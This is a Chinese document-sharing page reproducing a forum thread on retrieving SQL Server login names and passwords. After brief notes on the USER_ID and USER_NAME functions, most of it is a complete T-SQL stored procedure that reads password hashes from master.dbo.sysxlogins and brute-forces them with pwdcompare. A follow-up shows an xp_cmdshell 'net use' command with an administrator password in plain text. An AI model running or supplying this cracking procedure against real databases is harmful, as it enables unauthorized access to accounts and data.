没有合适的资源?快使用搜索试试~ 我知道了~
首页在SQL语句如何获得MSSQLSERVER登录用户和密码
资源详情
资源推荐
在 SQL 语句如何获得 MSSQLSERVER 登录用户和密码
http://topic.csdn.net/t/20060616/15/4825915.html
在 SQL Server 中,返回登录名或帐户的函数以下面的方式操作:
USER_ID('database_user_name')
USER_ID 返 回 与 指 定 数 据 库 用 户 名 关 联 的 数 据 库 用 户 ID 。 如 果 未 指 定
database_user_name,则 USER_ID 返回与当前连接关联的数据库用户 ID。
USER_NAME(database_user_ID)
USER_NAME 返回与指定的数据库用户 ID 关联的数据库用户名。如果未指定
database_user_ID,则 USER_NAME 返回与当前连接关联的数据库用户名。
CURRENT_USER、SESSION_USER、USER
这些函数都是 USER_NAME()(不指定 database_user_ID 参数的 USER NAME)的
同义词。
select user_name()
select name,password from sysusers where name=user_name();
如果你的电脑够好, 如果你有兴趣, 可以尝试穷举破解
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].
[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的 ASCII
理论上可以破解任意位数的密码,一般的电脑都可以破解 3 位密码
条件是你的电脑配置足够,时间足够
--邹建 2004.08(引用请保留此信息)--*/
/*--调用示例
--测试特殊字符
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_GetPassword
--测试带空格的密码
exec sp_password null,'a ','sa'
exec p_GetPassword
--测试中文
exec sp_password null,'我 ','sa'
exec p_GetPassword
--清除密码
exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=3 --密码破解的位数,默认只破解 3 位及以下的密码
as
--生成要破解的密码的用户表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--生成临时表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)
--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密码破解处理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解 1 位密码
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
--破解超过 2 位的密码
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @l=@l+1
,@s1=@s1+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '+@s1+' into #tt from '+@s2+'
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
end
--显示破解的密码
select 用户名=name,密码=pwdstr,密码 ASCII=pwd
from #pwd
go
再请教一下
在本机 SQL2005 的查询分析器中执行 EXEC
master..xp_cmdshell 'net use \\10.1.2.24\hx1 wcq /user:administrator' 其中 10.1.2.24 是
本机 IP 地址,报错,信息是:
发生系统错误 1219。
NULL
不允许一个用户使用一个以上用户名与一个服务器或共享资源的多重连接。中断与此服务
剩余11页未读,继续阅读
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功